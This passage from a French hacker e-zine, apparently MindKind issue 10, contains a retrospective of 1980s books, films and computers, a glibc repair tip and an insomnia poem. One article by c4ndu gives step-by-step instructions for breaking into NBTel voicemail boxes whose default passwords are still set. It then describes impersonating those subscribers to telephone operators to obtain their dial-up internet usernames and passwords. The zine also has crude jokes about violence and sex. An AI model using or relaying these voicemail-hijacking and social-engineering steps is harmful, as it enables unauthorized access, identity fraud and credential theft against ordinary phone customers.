     enregistrement de la table de livres dans la base de donnes bibliothque.
     Le codeur objet lui, va arriver et va dire  :  J'ai  un  livre.   J'ai  un
     programme biliothque. La biliothque contient des livres. En dessinant le
     tout on dirait que c'est semblable (1 pour non-objet, 2 pour objet) : 
     1) une [bdd]biblio --possde--> [table]livres
     2) un [programme]biblio --contient des--> [objets]livre
     Pour l'instant, c'est simple mais on ne voit pas  l'avantage?  C'est  ass
     facile pourtant... le 2) en objet, ben  c'est  dj  toute  cod  dans  le
     programme et rutilisable dans d'autres. Tandis qu'en 1), il  faut  entrer
     sa dans la base de donnes et APRS crer les objets et/ou bouttes de code
     Tellement diffrent.. De plus, si on rajoute des relations, en  1)  on  va
     voir des clefs trangres et en 2) on va voir des rfrences entre objets!
     ouf.
     L je me dis que le SQL  t conu juste pour donner des bdd universelles
     ou plutt  tre utilis partout. On offre  donc  une  interface  standard
     qui peut tre utilise dans tout autres  langages  en  l'embedant.  Si  on
     pense objet, on peut porter l'objet lui-mme en n'importe quel  langage...
     Seul affaire que je vois de laid et peu rapide en objet, c'est qu' chaque
     fois faut que tu "code" ta propre base de donne.. Exemple pour  faire  le
     lien entre  deux  objets,   il  faut  que  tu  implmentes  des  fonctions
     d'associations et blahblah, chose qui est dj inclut avec le SQL.  Nyways
     la POO est loin d'avoir aussi d'exprience et de vcu  que  les  bases  de
     donnes... mais quand mme, ceux qui trip objet vont  vous  le  dire  l'OO
     c'est l'avenir... (ils le crient depuis les annes 70-80 je crois :-)


1983 -- init_null 
     Il voulait du sexe, ben t ne cette anne la, donc ya fallu du sexe cette
     anne la ou en 1982... ahhh les porn kids :-P

1984 -- George Orwell et 1984
     Oui je sais que ce livre la  t crit dans les annes 40. C'est pour  a
     que j'appelle a "vu des annes 80 par le pass".  M'enfin, j'ai  vraiment
     pas t du par ce livre la. Bien sure vous le  connaissez  peut-tre  de
     par sa polmique du "Big Brother is watching you", mais ce  livre  la  est
     BEAUCOUP PLUS. C'est une vision presque  apocalyptique   des  annes  1980
     vu du pass. a pourrait tre vraiment  a  aujourd'hui  qui  sait.   Pour
     rsumer le tout (non je vais pas vous vendre le punch!),  le  gouvernement
     hyper socialiste domine les gens en 1984. Il  espionne,  il  invente  "Big
     Brother" qui est un  homme  bon  et  gentil  qu'il  faut  vnrer  et  qui
     reprsente le parti (le gouv est appel parti dans le livre). Dans  chaque
     pice ou presque, il y a un tl-cran (une tv quoi) qui permet  au  parti
     de voir ce qui se passe chez les gens, et  de  shooter  de  la  propagande
     24 heures sur 24. On ne peut pas arrter le tl-cran, on  ne  peut  mme
     pas faire "mute". Si jamais on parle contre le parti, on se fait buster et
     battre  mort jusqu' temps qu'on crve(heh) ou qu'on change  d'ides  sur
     le parti. Si jamais on pense  contre  le  parti,  mme  chose.  Toute  est
     contrl, ya des quotas de chocolat pour le  monde  et  mme  de  rasoirs.
     Pire encore, le gouvernement change le pass. Il rcrit tout  les  livres
     qui existent juste pour avoir raison, et il oblige le monde  le croire et
      refuser le pass rel. Je cite : "le pass n'existe que par les  livres,
     la vrit du pass est donc dans le prsent, si on a  le  pouvoir  sur  le
     prsent on a le pouvoir sur le pass". Parmi les propagandes du  parti,  
     par les tl-crans, ya des phrases qui  sont  crient   partout  dans  la
     ville : LA GUERRE C'EST LA PAIX. LA LIBERT C'EST L'ESCLAVAGE, L'INGORANCE
     C'EST LA FORCE. Et oui le parti a russi  faire gobber a  tout le monde
     Comment? Bien faut dire qu'il est bien organis, y divis  en  ministre.
     Le ministre de l'amour s'occupe des  crimes,  le  ministre  de  la  paix
     (/minipax/) s'occupe de la guerre... etc etc. Y'en a mme un  qui  a  fait
     une langue, la /novlangue/ (mots entres //). Cette langue a  pour  but  de
     remplacer l'ancienne langue.. qui  laisse  trop  d'imagination  aux  gens.
     Avec la nouvelle langue, les gens ne peuvent plus penser contre  le  parti
     en mal et il n'y a plus de /crimepenss/. Bref c'est la  belle  merde.  Le
     livre raconte l'histoire d'un gars dans le tas qui essaye de se  rebeller.
     Le punch c'est s'il se rebel ou pas et s'il gagne  ou  pas?   M'enfin,  la
     j'entends les voix qui me disent  "mais  last  de  nos  jours  ya  pas  de
     /crimepenss/ ni de /minipax/". Qu'est-ce que vous en savez?... Avez  vous
     dj essay de vous lever seul contre un GROS organisme, juste pour  voir?
     Y va vous ramasser.. vous le savez trop on le  sait  trop.    la  limite,
     avez-vous dj essay d'envoyer chier  un  organisme?  Y  protg  autant
     qu'un individu de corps et de sang, et il se dfend autant qu'un  tigre...
     L'image publique d'une compagnie, vous pensez que c'est quoi?  C'est  leur
     image. c'est important.. il ne faut pas penser contre nous,  car  si  nous
     avons le pouvoir, on va vous craser. Tant qu'a faire, si y'a un gars  qui
     pense que je suis lame, je vais lui casser la gueule. Mais c'est pas  trop
     pire.. on est  forces  gales,  d'homme    homme.   Maitenant  avec  une
     compagnie.. qu'est-ce qui arrive? Elle vous casse  la  gueule  d'aplomb...
     Et elle est beaucoup plus susceptible qu'une seule personne.   Prenez  par
     exemple Microsoft, que tlm connat. Avez vous dj fait un find des  sites
     anti-Microsoft? Il m'est arriv un soir que oui.. et 99% des sites taient
     DOWN. C'est trange...   et  Microsoft  qui  a  autant  d'avocats  que  de
     programmeurs (haha). Et c'est pas comme a juste dans  le  prive...  J'ai
     dj faite face  un tablissement scolaire (au niveau image d'eux  autres
     de libre expression et le tralala), et laisser-moi dire que ceux la  aussi
     leurs culs leurs tiennent  coeur... il faut  les  vnrer,  les  vnrer,
     pas de /crimepense/. Vous avez pas   savoir  a,  vous  avez  qu'  nous
     couter. VOTRE LIBERT C'EST NOTRE ESCLAVAGE, VOTRE IGNORANCE C'EST  VOTRE
     FORCE. Malheureusement, le JEDI que je suis  manqu de temps...   et  big
     brother a su s'occuper de moi.. ya fallu  que  je  fasse  des  confessions
     (pour ceux qui on lut 1984 la.. haha) pour de VRAI et que je MENTE, QUE JE
     MODIFIE LE PASS. Affreux, mais trs rel. La fiction qui a su  m'coeurer
     dans 1984 (coeurer dans le sens "ostie que c chien") m'avait dj  eu  en
     vrai... M'enfin toute sa pour vous expliquer que ce livre ma traumatis.


1985 -- Le pirate de l'informatique, Guide de la scurit informatique.
     Oh le beau livre! Je vais vous avertir tout de suite, vue de nos jours  ce
     livre est une vrai joke... Et c'est mme  se demander si c'tait pas  une
     joke  dans  le  temps  que  le  livre  est  sorti  originalement...   heh.
     Premirement c'est marqu en gros que a la t crit par le "Le  cracker"
     Bill Landreth, L'as des systmes  informatiques  apprhend  par  le  FBI.
     Yeah. Pour rire encore plus, a la t publi chez Microsoft Press  (haha)
     en 1985.. et M$ a mit un beau deni de responsabilit sur la page des infos
     d'impression. Dj dans le temps, ils avaient des avocats faut croire! heh
     M'a vous snipper des bouttes du  livres  parce  que  c'est  trop  drle  :
     "Prface : Ce livre est le compte rendu  de  mes  expriences  de  pirate,
     alors que j'avais seize ans.". mouheheheheheh hehe heh he. M'enfin,  c'est
     marrant de mme toute le long.. dommage que ce livre va se faire  expdier
     au vietnam, c'est de l'humour perdu. M'enfin, le livre comporte quand mme
     quelques bouts trs intressents. Surtout si on s'intresse au hacking des
     annes 80. Il y a quelque chose qui ma  frapp  par  contre.  Comment  les
     "hackers" taient poches. Genre,  leurs  skills  taient  gnralement  la
     connaissance des OS, dans le sens des  commandes.   Comprendre  un  OS  en
     taponnant avec tait considr comme une chose faite par les hackers.. Pas
     fort. De plus, le "password guessing" tait une mthode trs utilise,  et
     lorsque l'auteur en parle dans le livre, il prend son air full lite  pour
     dire que c'est "hot" de guesser un pass. Effectivement ce l'est,  mais  on
     rit de t'a aujourd'hui.. et pourtant. J'sais pas vous,  mais  je  connais
     des hax0rs (nouveau terme des annes 90 dans le dictionnaire LastCallient)
     qui guess les pass. J'en ai mme dj guess, avec succs. Oui c'est drle
     trs drle mme. En gros a ressemble  : on pouvait pas dvisser le cadre
     de porte, on pouvait pas briser la poigne, mais  la  clef  tait  sur  le
     tapis.. et des fois sous. Social engineering time. Ouais, le social  tait
     rserv aux grands hackers dans le temps, ceux qui voulait vraiment. C'est
     rendu quoi de nos jours? Le seul social que j'ai jamais vu/entendu  parler
     depuis loooongtemps c'est  des  emails  envoys  ou  autres  affaires  via
     Internet. Pourquoi pas se prsenter en vrai?  Aprs  tout  les  gardes  de
     scurit sont des gens gentils et qui vous donne volontier des  infos  sur
     n'importe quoi. (aller demander a  g4 pis init.. haha)  Faut  pas  avoir
     peur, aprs tout on va pas en prison parce que l'on tente d'aller voir  un
     ami qui travail dans une cie et qu'on se trompe d'endroit.   Voyon.   Bien
     qu'on rit des vieux des annes 80,  ya  des  techniques  qui  ne  mourront
     jamais, et toute les mthodes sont bonnes pour crosser le  monde,  surtout
     quand c'est pour le fun. Bon ok vous allez me dire "last ceux la y'on  pas
     de skills c juste des crosseurs". Ben justement un hax0r c'est plutt a..

     C'est quoi le Cenacle Last? Content que vous me poser la  question,  c'est
     justement dans le livre sous mes yeux. Well  dans  le  temps,  les  lites
     s'taient form une  crew,  le  Cenacle.   En  gros,  ils s'changeait  de
     l'information entre eux.. et taient envahi par des lamers  qui  voulaient
     apprendre mais qui n'avaient pas la vritable passion... a  ressemble  un
     peu  de nos jours non? Sauf que la tout est puissance  10.   Ils  avaient
     tabli des rgles qui ressemblent aux plus  vieilles  rgles  que  j'avais
     jamais trouves sur le net ( propos du hack): "Aucun  membre  du  Cenacle
     n'effacera ni n'altrera une  information  appartenant    un  utilisateur
     lgitime du systme, sans qu'il ne puisse facilement restituer ou corriger
     cette information." "Aucun membre ne laissera  le  nom  ni  le  numro  de
     tlphone d'un autre pirate sur quelque ordinateur que ce soit. Il  pourra
     y laisser le sien  ses propres risques." "Tous  les  membres  se  doivent
     d'obtenir et de partager leur propre lot d'information."  J'aime  bien  la
     dernire moi. J'adore la dernire. heh. C'est comme prner, la  libert  
     l'information ET un petit RTFM (subtile mais y la). Ah  oui,  j'oubliais,
     bien sure dans les annes 80 le tout se faisait par  modem,  pas  question
     d'Internet.. selon quelqu'un parano et sure de lui(y va  se  reconnatre),
     le tlphone c'est pas safe. Mais dans les annes 80, le phreaking tait 
     son boutte et puis les phreakers/hackers ownaient carrment  les  systmes
     tlphoniques. T'avais qu'a siffler dans  le  phone  pis  a  faisait  25
     (m'enfin presque). En passant Captain Crunch qui a trouv son sifflet dans
     les boites de crales du mme nom dans les annes 80 est pas mort. Y fait
     un firewall de dtection d'intrusion (IDS). Voici l'adresse : 
     http://www.webcrunchers.com/crunch/
     Pis y se tient encore ak Wozniak; le barbu de apple la! http://www.woz.org
     Vive les barbus finalement.
     haha.

     Y'avait tu de quoi d'intressent dans le livre Last? Ouais...   part  les
     rfrences historiques j'ai retenu quelques techniques qui valent la peine
     d'tre repens. Genre ya une technique qui constituait  trouver la  place
     dans la mmoire o les buffers de mots de passes tait.. Bon ok asteure la
     mem est protge, mais ya tu de quoi d'impossible? heh Bien sr,  dans  le
     temps les chevals de trois existaient.. et on pouvait faire CTRL-C pis  on
     avait un prompt avant de se  logger  (haha).   Finalement,  l'informatique
     c'est une grosse machine.. quand elle a prit son empleur en 80 tout  tait
     facile.. et plus que le temps avance, plus que les choses  se  compliques.
     D'un cot a c'est cool, parce que enfin on a des machines qui  sont  plus
     "efficaces".  part tout a, les autres techniques dcritent dans le livre
     sont trs semblable  ce que l'on retrouve de nos  jours  quand  quelqu'un
     break une box... Donc la seule  chose  intressante  qui  reste  c'est  la
     classification des hackers :
     - Le novice : Dans le livre ils disent que lui ya 12 ou 14 ans..
     Personnellement, je trouve que c'est trop jeune pour pouvoir qualifier  a
     de quelque chose.. mais je peux dire que j'en ai vu  14 qui programmaient
     et qui tait pas pire (ail attend un peu, ya moi dans le tas :-). 
     - L'tudiant : Lui c'est celui qui aime apprendre et qui s'ennuie  
     l'cole.. tout comme l'auteur je crois que je fais  parti  de  cette
     catgorie de personnes la.. genre la soif d'apprendre.. mais j'avoue
     avoir dj eu le fun du touriste des fois. On est tous  curieux  :-)
     - Le touriste : Lui y fait a juste pour le fun. Y se marre  trouver  des
     systmes ou de l'information et  jouer dedans. tre touriste peut parfois
     rapporter gros.. car il passe bcp de temps  fouiner... c't'un  peu  comme
     celui qui lit le journal  tout les jours.. y plus au courant des choses.
     - Le vandale : Dans le livre il  est  dcrit  comme  tant  quelqu'un  qui
     efface du  stock  pour  rien.   De  nos  jours  a  existe  encore,   mais
     malheureusement (en dpit en plus des tudiants et touristes) les vandales
     ont pris des proportions. Genre ceux qui smurf, qui nuke, qui ddos  mort,
     qui en vouent un culte. Qui vous rpondes pas avec leur intelligence  mais
     par leurs listes de broadcasts. Ceux la j'les haie. Y'on du pouvoir  et  y
     devraient pas en avoir. Tant qu' moi en plus, c'est juste des novices qui
     ont eux de la chance de sucer le bon monde pour avoir  accs    plein  de
     merdes pour faire la LOI. haha. Je vais arrter de parler contre  eux,  ma
     ben me faire smurfer.. ouuuuh.
     - Le voleur : Lui y considr comme un SUPER BAD. Il doit encore  exister
     de nos jours, mais on n'en entend pas trop parler. C'est  celui  qui  fait
     l'espion industriel pis qui vole de l'information pour la vendre. Et  oui,
     le hacking a souvent t une business..

     Ouais, ouais j'en avais beaucoup  dire sur ce livre(sujet) la.. aprs
     tout, il faut bien comprendre le pass pour connatre  le  prsent...!
     

1986 -- Ferris Bueller' Day Off
     J'ai quelques quotes que je retiens de ce film la...   la  toute  dernire
     chose avant le gnrique de fin que Ferris dit : "Life moves pretty  fast.
     If you don't stop and look around once in a while,  you  could  miss  it."
     En franais, pour ceux qui comprennent rien : "La  vie  bouge  trs  vite.
     Si tu t'arrtes pas pour regarder autour de toi un  instant,  tu  peux  la
     manquer.". Bien sr, Ferris hack trs facilement son cole et  change  son
     nombre d'absence... heh aprs a y dit : "I asked  for  a  car,  I  got  a
     computer. How's that for being born  under  a  bad  sign?"  L'important  
     retenir en franas : "J'ai demand pour avoir un char, j'ai eu  un  ordi."
     HEHE.


1986 -- Color Computer 3
     Je peux pas passer par les annes 80 sans parler de mon premier ordinateur
     C'tait un Color Computer 3, communment appel "COCO3".  C'est la  dessus
     que j'ai commenc  programmer en BASIC. Je l'ai mme plugg l'autre  jour
     pour montrer  MindFlayR de quoi a avait d'lair..
     http://mindkind.org:8787/coco3-2.JPG Remarquez l'entte encore... et  oui,
     Microsoft. Faut croire que mme dans les annes  80  M$  tait  prsent  
     plusieurs endroits...  J'avais  quelques  bons  jeux  la  dessus  aussi...
     Arkanoid, Rampage! Et des texts games genre "Police Academy" 1  5..  (non
     a pas rapport avec les films  poches).  M'enfin,  c'tait  un  ordinateur
     personnel fascinant dont le clavier tait  dans  la  mme  boite  que  les
     composantes et sa se branchait sur une TV. De nos jours, faut  payer  200$
     pour avoir une carte graphique pour avoir TV out.. hum hum!


Et voila, j'avoue que cet article est pas  mal du  genre  "exprimental"  et
j'espre qu'aux moins quelques personnes se sont amuses en lisant certaines
parties.. le retour aux sources, au pass, a fait toujours  du  bien.  BTW,
j'cris cette conclusion quelque mois plus tard que l'intro, et je peux vous
assurez, j'ai arrt d'couter du Micheal Jackson! HEE HEE! OW!!





 _____     _ _ ______________ _ __ __ _ _________ _ _ _______________
|     |\  |                                                          |\
| EOF | | | LastCall_                          lastcall@mindkind.org | |
|_____| | |__ _ ________ _______________ ___________________ ________| |
 \_____\|  \____________ _____________________________________________\|




  ____        
 | __ \  
 ||__| |      
 |____/         y la y la! tha fawking D!


                                           
                                                               _________
 _ _ _______________ ___________ _______ MindKind10 __ _ __ __/        /
|                                                            /        /
| free internet ppp account, by c4ndu                       / 10.15  /
'          aka: Enfin une utiliter pour mes 40 VBM         .  ----- /
 \_ _______ ______ _____ __ __ ___________ _______________/        '
                                                         /________/


Qu'est-ce que se petit con de c4ndu vient foutre dans  mon  zine?
Je ne suis pas rellement l pour rpondre  vos questions, alors
ceux qui sont trop l33t pour lire un article un peu  stupide  qui
ose traiter de phreaking  tata,  et  bien,  je  ne  vous  empche 
aucunement de sauter de texte.  Pour  le  reste, si a xiste ... 
en fin de compte je n'ai rien    vous  dire  d'interessant. Bon, 
commenon donc cette merde : l'article est constitue de 2 partis
La premire vous expliquera comment hacker facilement  une  boite
vocale du N.-B., (peut-tre mme au Qubec, je n'ai aucune ide.)
La 2ieme, et bien vous saurai quoi faire  exactement  avec  votre 
box hacke, autre que d'impressioner votre blonde.

Premirement,  hacker  une  boite vocale vendu par NBtel. Rien de 
plus simple, si notre ide  n'est pas  rellement d'en hacker une
en particulier;  mais  disons-le, pour le but final de l'article, 
l'idal n'est pas d'avoir  hack  une box en particulier, mais le
plus gros nombre possible (de box hacke). De 1, a prend un  bon
vieux livre de tlphone (bou-kin tlphonique), un tlphone, et
une  tte,   ce   qui   en   soit  est  normal  ...  Il  ne  vous 
reste plus qu' trouver le numros de tlphone pour avoir  accs
 votre box de l'extrieur de votre maison.  bathurst, c'est  le 
xxx-6245, mais vous pourrai facilement trouvez le bon  pour votre
rgion   avec  l 'aide d'une tlphoniste NBTel  (toujours  aussi 
plaisante  niaiser, et je prend l'occasion pour les  remercier.)

Donnez-moi 2 minutes pour  expliquer  quelque  chose  de  simple. 
Lorsque  l'on  s'abonne  pour recevoir une boite vocale NBTel, la 
personne en question reoit un  password temporaire,  et  par  un 
heureux hasard, c'est  son numros  de  tlphone.  Le  probleme, 
avec lequel tout le truc tourne au tour, est qu'on na accs   la 
boite vocale en question avec le password temporaire de 2 faons:
on entre par infraction chez la victime,  on  l'attache  sur  une 
chaise et on insere des ballets dans son  cul,  ou  on  apelle au 
numros xxx-6245, soit le numros qui nous permet d'avoir accs 
une boite vocale de l'extrieure. 

Le password temporaire demeure l  jusqu' se   que  la  personne
entre sur sa box;   cette instant, elle n'aura pas d'autre choix
que d'entrer un autre password. J'espre que c'est clair ... 

Maintenant, comment trouver des box o le password temporaire n'a
pas dj  t  chang?  Fac-il-e.  Vous  prenez  votre  manifique 
bou-kin tlphonique, et vous scannez  la main, en accedant  la 
box  l'aide du xxx-6245,  ou  le numros  qui  reprsente  votre 
rgion.  la seconde que vous entrerai sur une box o le password
temporaire est toujours valide, vous entendrai ceci:  "se systeme
de traitement de la voix [...] veuillez entrer votre mot de passe
temporaire [...]". Une fois entrer  (le  pass temp.),  le systeme
vous  demandera  d'entrer un nouveau password, et paf, une box de 
hacke. Si ce n'est pas simple comme bonjours, c'est probablement
parce que vous tes chinoix (pour ceux qui n'ont pas compris,j'ai
dis a en prtendant que les chinoix crive le mot bonjours  plus
compliqu que nous).

C'est bien beau tout a, mais sans but vritable. FAUX! J'en  est
trouv un, moi. Se  pogner des accounts dialup ...  et oui,  faut 
bien combler ses besoins vitaux. V'la 2 ans passes,  on  pouvait
apeller une opratrice NBNet, lui dir que nous sommes X, que nous
ne sommes pas chez nous, et lui demander notre password internet.
Faut croire que certain l'on dj trop exploit, car ils sont des 
devenus (NBTEL) un peu plus intlligent.Mais avec nos box hackes
le tour est jouer. Je vous explique : vous prennez une de vos box
hackes. Imaginons nous que le numros est 555-5555.  Vous  allez 
sur nbnet.nb.ca, dans powerpage, et vous clickez  sur  le  search 
qui vous permet d'entrer un numros de tlphone,  pour  recevoir 
un nom  (ici  je  supose que vous n'avez pas rellement marqu le 
nom de vos victimes,  mais si vous l'avez fait, cela vous sauvera 
quelques clicks). Vous avez donc les noms plus les numros de tel
de "vos" box. Vous tlphoner  NBTel une premire fois, et  vous
lui demandez, tout bonnement, comme si rien n'tait, si X,  ayant
le numros de tlphone 555-555,  toujours  un account internet.
(vous pouvez aussi vous faire passer pour  X.)  L'operatrice  dit 
non, vous racrochez, et vous essayez un autre nom-tel. Jusqu' se
qu'elle dit oui. Elle  dit oui? Vous racrochez, vous attendez  2
secondes, et vous rapellez. Cette fois vous  vous  faites  passez 
pour X,  vous  tes  chez  un ami, vous avez perdu votre password
internet/username,  et  vous  aimeriez  l'avoir  ...   elle  vous
suggerera de vous l'envoyez par le billet de votre  boite  vocale 
NBTel. J'crois que vous avez saisi la suite ...


							



ce ascii est gratuis, gare au emotif

                                            
      ,..o..,          ______     Mom?       
     ,"|~ ~|",        |__ __ |  /            
      @|' '|@         |  L    )              
       | " |          |  -   |              
       | - |           \    /      <-- SpyD                      
        |             \__/                                   
       /' '\           __||__
      (.) (.)         |      |   
    ,//|   |\\,       ||    ||
    '''|   |'''       ||    ||
 ------| # |-------- ooo----ooo----------
       || ||            
      oOo oOo



 _____     _ _ ______________ _ __ __ _ _________ _ _ _______________
|     |\  |                                                          |\
| EOF | | | c4ndu                                 c4ndu@mindkind.org | |
|_____| | |__ _ ________ _______________ ___________________ ________| |
 \_____\|  \____________ _____________________________________________\|



        ____         ,-------------------------------------------------
       /    \        | 
      |  _   |       | Vous venez d'enlevez le package glibc pour en
      | / \  |       | installez un plus recent et vous vous sentez 
      ||   | |      /  vraiment n00bs pcq vous etes pu capable de rien
      (.) (.)|     /   faire ? Vous en faites pas ca arrive a tout le
      ||   | |    <__  monde 1 fois dans sa vie, defois 2 :|. Comme
      ||   | | |     | vous venez de passer une semaine a installer et
      ||   | | |     | configurer votre box, vous avez tu pas envie de
      |____/|| |     | toute reinstaller ? j'pense que oui moi. Et bien
      |\___/ | |     | voici une methode vraiment tapon qui vous 
      ||   | | |     | permettra de tout reparer en sifflant comme un 
      ||   | | |     | epais, si vous avez le cd d'installation. En
      ||   | | |     | gros booter a partir du CD, ne formater surtout
      ||     | |       pas (duh), mounter vos drives de facon identique
      | \___/  |       a ce qu'il etais, et n'installer que Glibc. ce
      |        |       truc fonctionne super bien avec slackware. Je
       \______/        sais pas si les autre distro on un install assez
                       libertin pour vous pemettres de faire ca. Apres
                       tout jefface pas mon glibc a tout les jours.




                                                              _________
 _ _ _______________ ___________ _______ MindKind10 __ _ __ __/        /
|                                                            /        /
| Angoisse, by tigerbalm                                    / 10.16  /
'          aka: quand le sommeil va tout va                .  ----- /
 \_ _______ ______ _____ __ __ ___________ _______________/        '
                                                         /________/

Angoisse dun insomniaque


Depuis plusieurs semaines, je narrive plus  mendormir.  
Je mtends, en silence sur le lit, dans un noir complet.  
Mes paupires se ferment.  Les images se bousculent, 
les ides galement.  Mais le sommeil, lui, ne se prsente point.  
Il me laisse ptrir insidieusement, seul, au milieu dune chambre 
vide.  Jattends dtre transport, berc, nourri de ces histoires 
quils me racontaient.  Elles ne viennent jamais.  Le temps passe, 
langoisse sintensifie.  Au bout dun certain temps je mimpatiente.  
Ma-t-il oubli?  Viendra-t-il demain?  Puis, je me lve et la 
journe la soire continue.  

Il fait noir.  Le noir dune nuit tardive.  Je dcle mme une pointe 
daurore, derrire cette montagne qui abrite la mtropole.  Je 
narrive point  my faire: attendre les premiers rayons.  Ceux qui 
rchaufferont mon visage, illumineront mon regard.  Ces photons, 
tantt ondulant tantt corpusculant, bombarderont vhment la 
noirceur: lencre onctueuse, la tache immense, le drap napp 
recouvrant cette lumire.
 
 bien y rflchir, pourquoi perdre son temps sur un matelas insipide?  
Le monde entier reste  dcouvrir.  Il y a tant de pays  visiter.  
Tant de sciences  apprendre.  Tant de mystres  lucider.  Tant de 
maisons  construire.  Tant de pauvres  nourrir.  Tant denfants  
duquer.  Tant de femmes  sduire.

Temps nous manque.

Mieux vaut ne pas le perdre  roucouler le chant serein dune 
respiration lente et rythme.   feutrer les rves buttoir de la 
ralit.   rgler le chrono sur les autres, sur les embouteillages, 
sur les files dattente, les boites vocales, les rendez-vous, jen 
passe.  On se rveille trop tard: aprs la jeunesse, les amours, les 
passions.  Je vais linventer la glule de linsomniaque: de mon 
savoir de chimiste et mon ambition de chercheur.  Prserver ltre de 
la perte, recycler ses heures somnolentes.  Un peu de ceci, un peu de 
cela; la solution  reflux et voil!  Le mlange originel, llixir 
dune vie plus longue, plus sophistique, plus bcbg, moins oisive.

Mais ce soir, je suis las dtre seul.  La solitude mexaspre.  Jai 
envie dune conversation avec une femme magnifique. Avec une femme 
possdant la grce  comme il en existe tant.  Toujours tant.  Je hais 
ce mot.  Il me hante par son extrmisme, par son inexorable destin, 
par cette grandeur intarissable, insaisissable.  Je dois my faire.  
Me faire  cette socit de consommation,  cette recherche de la 
perfection,   cette lutte quotidienne dans larne humaine,  cette 
ataraxie illusoire dune insatiabilit incomprise.  Aprs tout, la 
vie cest peut-tre ne jamais avoir ce que lont veut.  Et sil 
fallait toujours conqurir et reconqurir sans arrter sa qute dune 
conqute?

 vingt ans, je croyais pouvoir changer le monde.  Rien ne pouvait 
altrer cette pope fantastique dans laquelle je plongeais  plein 
rgime.  La limite de lhorizon compltement anantie devant la 
splendeur de lavenir.  La lumire du gnie maveuglait.  Je pensais 
tre diffrent.  Je pensais avoir quelque chose de plus.  Mais 
aujourdhui tout scroule.  Je ralise que jai eu tord.  a ma 
frapp: un coup de fouet vicieux dans le dos, je men relve  peine.  
La plaie toujours ouverte expose impunment aux infections.  Cette 
lutte nest nul autre quune dfaite. Il nexiste point dautre but 
que de survivre, survivre  la mort.  

Terroris.  Je n'ai que vingt cinq ans mais j'ai peur,  peur de cette 
fin tragique, de cette tragi-comdie.  Pourquoi est-ce si comique?  
Parce quon connat son destin. Malgr tout on avance, jour aprs jour, 
nuit aprs nuit, sur le chemin funbre.  On n'y pense point.  Parce 
quon s'enferme dans la ralit,  comme des bte, comme nos  anctres.  
N'est-ce pas si triste tout cela?  J'en pleure.  Je pleure tous ces 
moments perdus, perdus  ne point sentir la vie. 

 m'tre lev puis couch sans prouver la moindre motion.

Les jours o je nai pas ressenti les quelques cent milles battements 
de mon cur.  Les jours o je nai pas pris part  la vie qui sest 
teinte ou  celle qui sest veille.  O je nai pas t dans les 
yeux de mes parents et amis en vivant toutes leurs souffrances, toutes 
leurs jouissances.  Les jours o je nai pas connu lamour,  o ces 
femmes sublimes sont apparues dans ma vie et je les ai laiss partir - 
sans agir.  Les jours o je nai pas particip  la guerre, ni prit 
conscience des tragdies qui se sont rvles un peu partout sur la 
Terre.  Les jours o je nai point dfi la mort.  Pour tous ces 
instants, pour tous ces sentiments qui ne manimeront pas.  Nest-ce 
pas tragique tous ces moments vanouis?

Vivre son dernier jour, chaque jour.  

Lorsque le souffle nous manque, les sentiments simples de notre 
existence complexe ressurgissent innocemment - lamour, lamiti, 
la gnrosit.  Ils deviennent si limpides quon se demande comment 
avons-nous fait pour ignorer lessentiel?  Et prcisment l,  cet 
instant  i , la vie vaut son pesant dor.  On donnerait tout pour 
quelques secondes de plus, pour se faire pardonner auprs des autres 
notre insouciance, nos priorits mal choisies, notre jalousie.    On 
regrettera lorgueil absurde et la froideur frigorifiante envers nos 
proches.  Ou encore les gestes de gratitude que lon na pas commis 
pour prserver notre image.  

Aimer cest exactement cela: perdre le contrle, dlaisser les rnes.  
Un quilibre prcaire, entirement vulnrable, sans aucune protection 
contre limprvu.  Une aventure dont on ne connat que le dbut.  On 
revit, on renat: le flux sanguin devient palpable dans nos veines.  Ce 
bouillonnement et ces palpitations dans lestomac sont issus 
principalement de cette crainte.  Mais hlas, la passion sestompe 
rapidement.  On en exige toujours trop.  On exige ce que personne ne 
peut donner.

Et puis on se fait vieux, les os craquent et se frottent sous chacun 
de nos lans.  Plus on se sent vieux, plus on vieillit, plus on pourrit: 
la trilogie de la spirale descendante.  Et on se demande o sont pass 
les annes?  Mais o sont-elles passs?  Tout dboule: les jours, les 
semaines, les mois.  On se rveille une nuit, comme celle-ci, et dj 
cinq annes se sont coules si ce nest pas plus   quand mon prochain 
rveil?  Lorsque jaurai trente ans?  Lorsque mes enfants iront  lcole?  
Ou encore sur le lit des dpouilles, dans le conglateur de la morgue?

Malgr que l'on sache tout cela, on continue de vivre l'inbranlable 
quotidien, linintressante routine.  C'est pour cette raison que la 
mort est en soi une tragi-comdie.  On peut bien en rire, rire de nous 
bien sr.

Heureusement, des instants restent  vivre!  Oui, la vie est un instant.  
Des petits instants racols, rabouts, rapics.  On en vit un 
prsentement.  Des secondes prcieuses, pleines dimportance,  la 
rencontre de notre destine.  Ces courts intervalles que lon sait 
unique, remplis dun mystre insondable, devant le regard dun autre, 
dune autre.  Il ne faut pas oublier toute cette  mditation durant 
nos dcisions.  

Le sommeil, malicieux, complice de nos oublies.

De cette lassitude incohrente nat une insouciance menotte  des 
principes dont les raisons nous chappent: nous sommes bien li  
notre triste sort.  Maintenant que j'ai pleur, j'ai mal.  Mes yeux 
souffrent.  Mon coeur brle.  Mes mains tremblent.  Je suis dsormais 
avide de vivre.  Mon esprit transcende la lucidit.  Mais je vous l'ai 
dit, il me reste  dormir.  Et demain tout ceci sombrera dans l'oublie.  
Mon esprit endormi m'empchera de raturer linsipide, le laid, le fade 
et le superficiel de tous les jours.  Il mempchera de prendre les 
dcisions dstabilisantes: celles qui pourront bouleverser mes valeurs,  
celles qui chambarderont ma stabilit motionnelle.  Je vais me rappeler 
mes engagements, mes responsabilits, mes habitudes, mon mauvais 
caractre, mon manque de confiance.  

Il n'y a rien  faire.  L'engrenage fatal, bien huil, tourbillonne 
machinalement vers linluctable fin.

Bonne nuit.


							


 _____     _ _ ______________ _ __ __ _ _________ _ _ _______________
|     |\  |                                                          |\
| EOF | | | Tigerbalm                         tigerbalm@mindkind.org | |
|_____| | |__ _ ________ _______________ ___________________ ________| |
 \_____\|  \____________ _____________________________________________\|




        ____         ,-------------------------------------------------
       /    \        | Vous vous etes surement deja demander la 
      |  _   |       | signification de la vie. Et bien les "philosophes"
      | / \  |       | de mindkind se sont attelez a cette tache et on
      ||   | |      /  creer "the equation of life". Le seul probleme 
      (.) (.)|     /   c'est qui a rien a comprendre....
      ||   | |    <__  
      ||   | | |     | 
      ||   | | |     | The equation of life :
      |____/|| |     | vagin == subway == cgep == vomi == vic20 == bitchx ==
      |\___/ | |     | musique + en reprise == oksala == 100 shooter a 4 == 
